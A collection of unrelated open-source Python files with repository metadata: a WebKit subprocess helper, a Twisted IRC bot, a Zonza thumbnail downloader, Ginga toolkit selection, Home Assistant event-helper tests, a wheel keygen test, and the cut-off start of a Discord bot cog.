def _stringify_args(self, args):
# Popen will throw an exception if args are non-strings (like int())
string_args = map(unicode, args)
# The Windows implementation of Popen cannot handle unicode strings. :(
return map(self._encode_argument_if_needed, string_args)
# The only required arugment to popen is named "args", the rest are optional keyword arguments.
def popen(self, args, **kwargs):
# FIXME: We should always be stringifying the args, but callers who pass shell=True
# expect that the exact bytes passed will get passed to the shell (even if they're wrongly encoded).
# shell=True is wrong for many other reasons, and we should remove this
# hack as soon as we can fix all callers to not use shell=True.
if kwargs.get('shell') == True:
string_args = args
else:
string_args = self._stringify_args(args)
return subprocess.Popen(string_args, **kwargs)
def run_in_parallel(self, command_lines_and_cwds, processes=None):
"""Runs a list of (cmd_line list, cwd string) tuples in parallel and returns a list of (retcode, stdout, stderr) tuples."""
assert len(command_lines_and_cwds)
if sys.platform in ('cygwin', 'win32'):
return map(_run_command_thunk, command_lines_and_cwds)
pool = multiprocessing.Pool(processes=processes)
results = pool.map(_run_command_thunk, command_lines_and_cwds)
pool.close()
pool.join()
return results
def _run_command_thunk(cmd_line_and_cwd):
# Note that this needs to be a bare module (and hence Picklable) method to work with multiprocessing.Pool.
(cmd_line, cwd) = cmd_line_and_cwd
proc = subprocess.Popen(cmd_line, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
return (proc.returncode, stdout, stderr)
| 166MMX/openjdk.java.net-openjfx-8u40-rt | modules/web/src/main/native/Tools/Scripts/webkitpy/common/system/executive.py | Python | gpl-2.0 | 21,626 |
#!/usr/bin/python
import os
import sys
import urlparse
import logging
import hashlib
import json
import importlib
import glob
from optparse import OptionParser
import redis
from twisted.words.protocols import irc
from twisted.internet import ssl, reactor, protocol
from werkzeug.routing import Map, DEFAULT_CONVERTERS, BaseConverter, Rule
from werkzeug.exceptions import NotFound, MethodNotAllowed
from converters import *
class Diatribe(irc.IRCClient):
"""docstring for Diatribe"""
nickname = None
channels = {}
plugins = {}
def __init__(self, nickname, config):
self.nickname = nickname
self.plugin_config = config
triggerConverter = self.create_trigger_converter()
my_converters = {'fstring': FinalStringConverter,
'url': URLConverter, 'trigger': triggerConverter}
my_converters.update(DEFAULT_CONVERTERS)
self.rule_map = Map([], converters=my_converters)
self.load_plugins()
self.mapper = self.rule_map.bind(self.nickname, '/',
default_method='chanmsg')
logging.debug('mapper rules: %s' % str(self.mapper.map._rules))
def load_plugins(self):
path = os.path.relpath(os.path.dirname(__file__))
logging.debug('path is %s' % path)
for plugin_src in glob.glob('%s/plugins/*.py' % path):
name = plugin_src.replace('.py', '').replace('/', '.')
if name.find('__') > 0:
continue
logging.debug('Attempting to load plugin at %s' % name)
try:
plugin = importlib.import_module(name)
except ImportError:
logging.error('Unable to load plugin at %s' % plugin_src)
logging.exception("Caught exception loading plugin:")
continue
self.plugins.update({name: {'class': plugin}})
try:
klass = getattr(plugin, plugin.ENTRY_CLASS)
except AttributeError:
logging.error('Unable to load plugin %s, ENTRY_CLASS undefined' % name)
continue
try:
klass(self)
logging.info('successfully loaded plugin %s' % name)
except:
logging.error('Failed to initialize plugin %s' % name)
logging.exception('Caught exception: ')
pass
def create_trigger_converter(self):
my_tc = BaseConverter
my_tc.regex = r"%s|(%s:\s+)" % (self.plugin_config['trigger'],
self.nickname)
return my_tc
def register_command(self, name, command,
endpoint, methods=None, custom_rule=None, query=True):
plugin = self.plugins[name]
if 'commands' in plugin:
plugin['commands'].append(command)
else:
plugin['commands'] = [command]
self.plugins[name] = plugin
rules = []
if len(plugin['commands']) > 1:
rules.append("<any(%s):cmd> " % ', '.join(plugin['commands']))
else:
rules.append(plugin['commands'][0])
if custom_rule:
rules.append(custom_rule)
if query:
rules.append("<fstring:query>")
logging.debug('rules are %s' % rules)
rule_str = "/<trigger:t>" + ' '.join(rules)
rule = Rule(rule_str, endpoint=endpoint, methods=methods)
if rule in self.rule_map._rules:
index = self.rule_map._rules.index(rule)
del self.rule_map._rules[index]
self.rule_map._rules.update()
self.rule_map.add(rule)
def connectionMade(self):
irc.IRCClient.connectionMade(self)
logging.info("connected")
def signedOn(self):
logging.info("signed on to %s" % self.hostname)
if self.factory.network not in self.factory.store.hkeys('networks'):
self.host_id = hashlib.sha1(self.factory.network).hexdigest()[:9]
self.factory.store.hset('networks',
self.factory.network, self.host_id)
logging.debug('set host id in redis')
else:
self.host_id = self.factory.store.hget('networks',
self.factory.network)
logging.debug('got host id from redis')
for channel in self.factory.config['channels']:
self.join(channel.encode('UTF-8'))
def joined(self, channel):
logging.debug('host_id is %s ' % self.host_id)
if channel not in self.channels:
chan_obj = {}
chan_obj['id'] = hashlib.sha1(channel).hexdigest()[:9]
self.channels[channel] = chan_obj
chan_ids = dict([(k, v['id']) for k, v in self.channels.iteritems()])
self.factory.store.hmset('%s.channels' % self.host_id, chan_ids)
logging.debug('set %s.channels to %s' % (self.host_id, chan_ids))
logging.info("joined %s" % channel)
def privmsg(self, nick, channel, msg):
nick = nick.split("!")[0].encode('UTF-8')
channel = channel.decode('UTF-8')
msg = msg.encode('UTF-8')
if channel == self.nickname:
self.dispatch_plugin(nick, nick, msg, method='privmsg')
else:
self.dispatch_plugin(nick, channel, msg)
def dispatch_plugin(self, nick, channel, msg=None, method=None):
logging.debug('dispatching plugin with msg: %s' % msg)
path = "/"+msg.replace(' ', ' ')
logging.debug('path is %s' % path)
try:
endpoint, args = self.mapper.match(path, method)
except (NotFound, MethodNotAllowed):
logging.debug('not calling endpoint')
if method in ['privmsg', 'chanmsg']:
logging.debug("%s: <%s> %s" % (channel, nick, msg))
return False
return False
else:
logging.debug('calling endpoint %s, args %s' % (str(endpoint), args))
endpoint(channel.encode('UTF-8'), nick, msg, args)
class DiatribeFactory(protocol.ClientFactory):
"""docstring for DiatribeFavtory"""
def __init__(self, network, config):
dbn = os.environ.get('REDISCLOUD_URL', config['dbn'])
if not dbn or "redis" not in dbn:
logging.error("Diatribe doesn't support anything except redis right now, please use a redis db")
sys.exit(1)
url = urlparse.urlparse(dbn)
self.store = redis.StrictRedis(host=url.hostname,
port=url.port, password=url.password)
self.network = network
self.config = config['networks'][network]
if 'plugins' in config:
self.plugin_config = config['plugins']
else:
self.plugin_config = None
def buildProtocol(self, addr):
p = Diatribe(self.config['nickname'].encode('UTF-8'),
self.plugin_config)
p.factory = self
return p
def clientConnectionLost(self, connector, reason):
connector.connect()
def clientConnectionFailed(self, connector, reason):
reactor.stop()
def main(config="config.json", debug=False):
if debug:
logging.basicConfig(level=logging.DEBUG)
try:
config = json.load(open(config))
except:
logging.error('unable to parse config')
sys.exit(1)
for network in config['networks']:
net_config = config['networks'][network]
logging.debug('netconfig is %s ' % net_config)
f = DiatribeFactory(network, config)
if net_config['ssl']:
reactor.connectSSL(net_config['network'],
net_config['port'], f,
ssl.ClientContextFactory())
else:
reactor.connectTCP(net_config['network'], net_config['port'], f)
del f
reactor.run()
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-c', '--config', dest='config', default="config.json")
parser.add_option('-d', '--debug', action="store_true", dest="debug")
opts = parser.parse_args()[0]
for opt, val in opts.__dict__.iteritems():
if not val and opt != "debug":
print "missing option --%s" % opt
sys.exit(1)
main(**opts.__dict__)
| twexler/diatribe | diatribe/bot/__main__.py | Python | gpl-2.0 | 8,361 |
#!/usr/bin/env python
import os
import requests
import json
import sys
from pprint import pprint
url = 'http://api.zonza.tv:8080/v0/'
def raise_invalid():
raise RuntimeError('Credentials not configured. Please set ' \
'env variables BORK_TOKEN and BORK_USERNAME')
auth = {
'Bork-Token': os.environ.get("BORK_TOKEN") or raise_invalid(),
'Bork-Username': os.environ.get("BORK_USERNAME") or raise_invalid(),
}
print 'searching...'
headers = {'content-type': 'application/json'}
headers.update(auth)
with open('/Users/stevenchallis/common-mapped', 'r') as common:
for item in common:
ITEM = item.split(' ', 1)[0]
path = 'http://api.zonza.tv:8080/v0/item/{}/thumbnail/0'.format(ITEM)
print path
response = requests.get(path,
headers=headers)
with open('thumbs/{0}.png'.format(ITEM), 'wb') as f:
f.write(response.content)
| zonza/zonza-api-examples | python/download_thumbnails.py | Python | mit | 955 |
#
# toolkit.py -- module for customizing Ginga GUI toolkit version
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
toolkit = 'choose'
family = None
class ToolKitError(Exception):
pass
def use(name):
"""
Set the name of the GUI toolkit we should use.
"""
global toolkit, family
name = name.lower()
if name.startswith('choose'):
pass
elif name.startswith('qt') or name.startswith('pyside'):
family = 'qt'
if name == 'qt':
name = 'qt4'
assert name in ('qt4', 'pyside'), \
ToolKitError("ToolKit '%s' not supported!" % (name))
elif name.startswith('gtk'):
family = 'gtk'
if name == 'gtk':
name = 'gtk2'
assert name in ('gtk2', ), \
ToolKitError("ToolKit '%s' not supported!" % (name))
elif name.startswith('tk'):
family = 'tk'
assert name in ('tk', ), \
ToolKitError("ToolKit '%s' not supported!" % (name))
else:
ToolKitError("ToolKit '%s' not supported!" % (name))
toolkit = name
def get_toolkit():
return toolkit
def get_family():
return family
#END
| Rbeaty88/ginga | ginga/toolkit.py | Python | bsd-3-clause | 1,327 |
#/usr/bin/python
#
# Copyright 2013 Luke Hackett
# https://github.com/LukeHackett
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Reactor(object):
def __init__(self, button, led):
self.button = button
self.led = led
def turn_led_on(self):
self.led.turn_on()
def turn_led_off(self):
self.led.turn_off()
| LukeHackett/python-pi-cookbook | reactor/reactor.py | Python | apache-2.0 | 824 |
"""Test event helpers."""
# pylint: disable=protected-access
import asyncio
from datetime import datetime, timedelta
from unittest.mock import patch
from astral import Astral
import pytest
from homeassistant.core import callback
from homeassistant.setup import async_setup_component
import homeassistant.core as ha
from homeassistant.const import MATCH_ALL
from homeassistant.helpers.event import (
async_call_later,
async_track_point_in_time,
async_track_point_in_utc_time,
async_track_same_state,
async_track_state_change,
async_track_sunrise,
async_track_sunset,
async_track_template,
async_track_time_change,
async_track_time_interval,
async_track_utc_time_change,
)
from homeassistant.helpers.template import Template
from homeassistant.components import sun
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
DEFAULT_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
def teardown():
"""Stop everything that was started."""
dt_util.set_default_time_zone(DEFAULT_TIME_ZONE)
def _send_time_changed(hass, now):
"""Send a time changed event."""
hass.bus.async_fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
async def test_track_point_in_time(hass):
"""Test track point in time."""
before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
runs = []
async_track_point_in_utc_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
_send_time_changed(hass, before_birthday)
await hass.async_block_till_done()
assert len(runs) == 0
_send_time_changed(hass, birthday_paulus)
await hass.async_block_till_done()
assert len(runs) == 1
# A point in time tracker will only fire once, this should do nothing
_send_time_changed(hass, birthday_paulus)
await hass.async_block_till_done()
assert len(runs) == 1
async_track_point_in_utc_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
_send_time_changed(hass, after_birthday)
await hass.async_block_till_done()
assert len(runs) == 2
unsub = async_track_point_in_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
unsub()
_send_time_changed(hass, after_birthday)
await hass.async_block_till_done()
assert len(runs) == 2
async def test_track_state_change(hass):
"""Test track_state_change."""
# 2 lists to track how often our callbacks get called
specific_runs = []
wildcard_runs = []
wildercard_runs = []
def specific_run_callback(entity_id, old_state, new_state):
specific_runs.append(1)
async_track_state_change(
hass, 'light.Bowl', specific_run_callback, 'on', 'off')
@ha.callback
def wildcard_run_callback(entity_id, old_state, new_state):
wildcard_runs.append((old_state, new_state))
async_track_state_change(hass, 'light.Bowl', wildcard_run_callback)
@asyncio.coroutine
def wildercard_run_callback(entity_id, old_state, new_state):
wildercard_runs.append((old_state, new_state))
async_track_state_change(hass, MATCH_ALL, wildercard_run_callback)
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(specific_runs) == 0
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
assert wildcard_runs[-1][0] is None
assert wildcard_runs[-1][1] is not None
# Set same state should not trigger a state change/listener
hass.states.async_set('light.Bowl', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 0
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
# State change off -> on
hass.states.async_set('light.Bowl', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 2
assert len(wildercard_runs) == 2
# State change off -> off
hass.states.async_set('light.Bowl', 'off', {"some_attr": 1})
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 3
assert len(wildercard_runs) == 3
# State change off -> on
hass.states.async_set('light.Bowl', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 4
assert len(wildercard_runs) == 4
hass.states.async_remove('light.bowl')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 5
assert len(wildercard_runs) == 5
assert wildcard_runs[-1][0] is not None
assert wildcard_runs[-1][1] is None
assert wildercard_runs[-1][0] is not None
assert wildercard_runs[-1][1] is None
# Set state for different entity id
hass.states.async_set('switch.kitchen', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 5
assert len(wildercard_runs) == 6
async def test_track_template(hass):
"""Test tracking template."""
specific_runs = []
wildcard_runs = []
wildercard_runs = []
template_condition = Template(
"{{states.switch.test.state == 'on'}}",
hass
)
template_condition_var = Template(
"{{states.switch.test.state == 'on' and test == 5}}",
hass
)
hass.states.async_set('switch.test', 'off')
def specific_run_callback(entity_id, old_state, new_state):
specific_runs.append(1)
async_track_template(hass, template_condition, specific_run_callback)
@ha.callback
def wildcard_run_callback(entity_id, old_state, new_state):
wildcard_runs.append((old_state, new_state))
async_track_template(hass, template_condition, wildcard_run_callback)
@asyncio.coroutine
def wildercard_run_callback(entity_id, old_state, new_state):
wildercard_runs.append((old_state, new_state))
async_track_template(
hass, template_condition_var, wildercard_run_callback,
{'test': 5})
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 2
assert len(wildercard_runs) == 2
async def test_track_same_state_simple_trigger(hass):
"""Test track_same_change with trigger simple."""
thread_runs = []
callback_runs = []
coroutine_runs = []
period = timedelta(minutes=1)
def thread_run_callback():
thread_runs.append(1)
async_track_same_state(
hass, period, thread_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
@ha.callback
def callback_run_callback():
callback_runs.append(1)
async_track_same_state(
hass, period, callback_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
@asyncio.coroutine
def coroutine_run_callback():
coroutine_runs.append(1)
async_track_same_state(
hass, period, coroutine_run_callback,
lambda _, _2, to_s: to_s.state == 'on')
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(thread_runs) == 0
assert len(callback_runs) == 0
assert len(coroutine_runs) == 0
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(thread_runs) == 1
assert len(callback_runs) == 1
assert len(coroutine_runs) == 1
async def test_track_same_state_simple_no_trigger(hass):
"""Test track_same_change with no trigger."""
callback_runs = []
period = timedelta(minutes=1)
@ha.callback
def callback_run_callback():
callback_runs.append(1)
async_track_same_state(
hass, period, callback_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(callback_runs) == 0
# Change state on state machine
hass.states.async_set("light.Bowl", "off")
await hass.async_block_till_done()
assert len(callback_runs) == 0
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(callback_runs) == 0
async def test_track_same_state_simple_trigger_check_funct(hass):
"""Test track_same_change with trigger and check funct."""
callback_runs = []
check_func = []
period = timedelta(minutes=1)
@ha.callback
def callback_run_callback():
callback_runs.append(1)
@ha.callback
def async_check_func(entity, from_s, to_s):
check_func.append((entity, from_s, to_s))
return True
async_track_same_state(
hass, period, callback_run_callback,
entity_ids='light.Bowl', async_check_same_func=async_check_func)
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(callback_runs) == 0
assert check_func[-1][2].state == 'on'
assert check_func[-1][0] == 'light.bowl'
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(callback_runs) == 1
async def test_track_time_interval(hass):
"""Test tracking time interval."""
specific_runs = []
utc_now = dt_util.utcnow()
unsub = async_track_time_interval(
hass, lambda x: specific_runs.append(1),
timedelta(seconds=10)
)
_send_time_changed(hass, utc_now + timedelta(seconds=5))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, utc_now + timedelta(seconds=13))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, utc_now + timedelta(minutes=20))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
_send_time_changed(hass, utc_now + timedelta(seconds=30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
async def test_track_sunrise(hass):
"""Test track the sunrise."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
hass.config.latitude = latitude
hass.config.longitude = longitude
assert await async_setup_component(hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = datetime(2014, 5, 24, 12, 0, 0, tzinfo=dt_util.UTC)
utc_today = utc_now.date()
mod = -1
while True:
next_rising = (astral.sunrise_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_rising > utc_now:
break
mod += 1
# Track sunrise
runs = []
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub = async_track_sunrise(hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub2 = async_track_sunrise(hass, lambda: offset_runs.append(1),
offset)
# run tests
_send_time_changed(hass, next_rising - offset)
await hass.async_block_till_done()
assert len(runs) == 0
assert len(offset_runs) == 0
_send_time_changed(hass, next_rising)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 0
_send_time_changed(hass, next_rising + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
unsub()
unsub2()
_send_time_changed(hass, next_rising + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
async def test_track_sunset(hass):
"""Test track the sunset."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
hass.config.latitude = latitude
hass.config.longitude = longitude
assert await async_setup_component(hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = datetime(2014, 5, 24, 12, 0, 0, tzinfo=dt_util.UTC)
utc_today = utc_now.date()
mod = -1
while True:
next_setting = (astral.sunset_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_setting > utc_now:
break
mod += 1
# Track sunset
runs = []
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub = async_track_sunset(hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub2 = async_track_sunset(
hass, lambda: offset_runs.append(1), offset)
# Run tests
_send_time_changed(hass, next_setting - offset)
await hass.async_block_till_done()
assert len(runs) == 0
assert len(offset_runs) == 0
_send_time_changed(hass, next_setting)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 0
_send_time_changed(hass, next_setting + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
unsub()
unsub2()
_send_time_changed(hass, next_setting + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
async def test_async_track_time_change(hass):
"""Test tracking time change."""
wildcard_runs = []
specific_runs = []
unsub = async_track_time_change(hass,
lambda x: wildcard_runs.append(1))
unsub_utc = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), second=[0, 30])
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 15))
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 3
unsub()
unsub_utc()
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 3
async def test_periodic_task_minute(hass):
"""Test periodic tasks per minute."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), minute='/5',
second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 3, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 5, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
_send_time_changed(hass, datetime(2014, 5, 24, 12, 5, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
async def test_periodic_task_hour(hass):
"""Test periodic tasks per hour."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2',
minute=0, second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 23, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 25, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 25, 1, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
unsub()
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
async def test_periodic_task_wrong_input(hass):
"""Test periodic tasks with wrong input."""
specific_runs = []
with pytest.raises(ValueError):
async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/two')
_send_time_changed(hass, datetime(2014, 5, 2, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 0
async def test_periodic_task_clock_rollback(hass):
"""Test periodic tasks with the time rolling backwards."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2', minute=0,
second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 23, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 24, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 4
unsub()
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 4
async def test_periodic_task_duplicate_time(hass):
"""Test periodic tasks not triggering on duplicate time."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2', minute=0,
second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 25, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
async def test_periodic_task_entering_dst(hass):
"""Test periodic task behavior when entering dst."""
tz = dt_util.get_time_zone('Europe/Vienna')
dt_util.set_default_time_zone(tz)
specific_runs = []
unsub = async_track_time_change(
hass, lambda x: specific_runs.append(1), hour=2, minute=30,
second=0)
_send_time_changed(hass, tz.localize(datetime(2018, 3, 25, 1, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 25, 3, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 26, 1, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 26, 2, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 1
unsub()
async def test_periodic_task_leaving_dst(hass):
"""Test periodic task behavior when leaving dst."""
tz = dt_util.get_time_zone('Europe/Vienna')
dt_util.set_default_time_zone(tz)
specific_runs = []
unsub = async_track_time_change(
hass, lambda x: specific_runs.append(1), hour=2, minute=30,
second=0)
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 5, 0),
is_dst=False))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 55, 0),
is_dst=False))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 5, 0),
is_dst=True))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 55, 0),
is_dst=True))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
async def test_call_later(hass):
"""Test calling an action later."""
def action():
pass
now = datetime(2017, 12, 19, 15, 40, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.event'
'.async_track_point_in_utc_time') as mock, \
patch('homeassistant.util.dt.utcnow', return_value=now):
async_call_later(hass, 3, action)
assert len(mock.mock_calls) == 1
p_hass, p_action, p_point = mock.mock_calls[0][1]
assert p_hass is hass
assert p_action is action
assert p_point == now + timedelta(seconds=3)
async def test_async_call_later(hass):
"""Test calling an action later."""
def action():
pass
now = datetime(2017, 12, 19, 15, 40, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.event'
'.async_track_point_in_utc_time') as mock, \
patch('homeassistant.util.dt.utcnow', return_value=now):
remove = async_call_later(hass, 3, action)
assert len(mock.mock_calls) == 1
p_hass, p_action, p_point = mock.mock_calls[0][1]
assert p_hass is hass
assert p_action is action
assert p_point == now + timedelta(seconds=3)
assert remove is mock()
| jnewland/home-assistant | tests/helpers/test_event.py | Python | apache-2.0 | 23,251 |
from .. import tool
def test_keygen():
def get_keyring():
WheelKeys, keyring = tool.get_keyring()
class WheelKeysTest(WheelKeys):
def save(self):
pass
class keyringTest:
backend = keyring.backend
class backends:
file = keyring.backends.file
@classmethod
def get_keyring(cls):
class keyringTest2:
pw = None
def set_password(self, a, b, c):
self.pw = c
def get_password(self, a, b):
return self.pw
return keyringTest2()
return WheelKeysTest, keyringTest
tool.keygen(get_keyring=get_keyring)
| ARMmbed/yotta_osx_installer | workspace/lib/python2.7/site-packages/wheel/test/test_tool.py | Python | apache-2.0 | 819 |
from secret import GOOGLE_API_KEY
from datetime import datetime
from util.arguments import Arguments
from discord.ext import commands
from shlex import split
from util.choices import enum
from collections import namedtuple
import util
import re
import urllib
import discord
class Portables:
def __init__(self, bot):
self.bot = bot
@staticmethod
def _format_data(json):
date_format = '%d %b, %H:%M'
struct = namedtuple('Portable', ['author', 'last_updated', 'locations', 'time'])
# Populating portables
time = datetime.strptime(json['values'][2][1], date_format).replace(year=datetime.utcnow().year)
author = json['values'][2][3]
last_updated = util.format_timedelta(datetime.utcnow() - time, short_names=True)
locations = {'fletchers': {}, 'crafters': {}, 'braziers': {}, 'sawmills': {}, 'forges': {}, 'ranges': {}, 'wells': {}}
# Finding all worlds for portables
for i in range(7):
worlds = locations[json['values'][0][i].strip().lower()]
locs = json['values'][1][i]
# Checking if no worlds
if 'host needed' in locs.lower() or 'n/a' in locs.lower():
